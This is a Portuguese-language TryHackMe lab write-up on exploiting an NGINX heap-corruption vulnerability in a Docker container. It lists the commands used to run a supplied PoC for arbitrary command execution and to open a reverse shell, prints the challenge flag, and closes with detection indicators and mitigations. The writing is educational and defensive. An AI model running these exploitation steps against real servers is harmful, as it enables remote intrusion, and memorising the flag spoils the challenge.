
Este laboratório demonstra a exploração do CVE-2024-24945, uma vulnerabilidade de corrupção de heap que afeta o NGINX. O objetivo era compreender como a corrupção de memória pode levar à Execução Remota de Código (RCE) e obter experiência prática em técnicas de exploração, detecção e mitigação.
Este laboratório demonstra a exploração da CVE-2024-24945, uma vulnerabilidade de corrupção de heap que afeta o NGINX. O objetivo era entender como a corrupção de memória pode levar à Execução Remota de Código (RCE) e adquirir experiência prática em técnicas de exploração, detecção e mitigação.
. Verificar o serviço NGINX vulnerável. . Executar comandos arbitrários usando o proof of concept (PoC) fornecido. . Obter um reverse shell no contêiner alvo. . Recuperar a flag do desafio. . Entender estratégias de detecção e mitigação.
. Platform: TryHackMe . Target Service: NGINX RIFT . Containerized Environment: Docker . Exploit Tool: poc.py . Access Method: VNC (Virtual Network Computing)
Service Verification
confirmado que o contêiner vulnerável estava em execução e acessível.
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
backend ok
Executou o PoC fornecido para validar a execução de comandos arbitrários.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Verificado execução bem-sucedida:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Output: hello from depthfirst
Estabelecer um shell interativo no contêiner alvo.
python3 poc.py --shell
Successful Connection:
[] listening for reverse shell on port 1337... [] connected. $
Acessou a flag do desafio.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
Defensores podem identificar tentativas de exploração através de:
. Quebras do worker do NGINX . Eventos de falha de segmentação . Conexões de rede de saída inesperadas . Processos shell suspeitos (/bin/sh, bash) . Criação não autorizada de arquivos em diretórios temporários
. Atualizar para uma versão corrigida do NGINX. . Aplicar o princípio do menor privilégio. . Restringir tráfego de rede de saída desnecessário Implementar monitoramento contínuo de logs. . Usar controles de segurança de contêineres e monitoramento de tempo de execução
Este laboratório proporcionou experiência prática em:
. Entender vulnerabilidades de corrupção de heap. . Explorar falhas de Execução Remota de Código. . Estabelecer reverse shells. . Realizar validação pós-exploração. . Reconhecer indicadores de comprometimento e técnicas de mitigação.
Este exercício foi realizado em um ambiente de laboratório TryHackMe controlado, apenas para fins educacionais e de treinamento em cibersegurança defensiva.
Author: [Benedict Ejepu Amaechi] Platform: TryHackMe Topic: CVE-2024-24945 9NGINX RIFT0 Exploitation and Defence Date Completed: Junho de 2026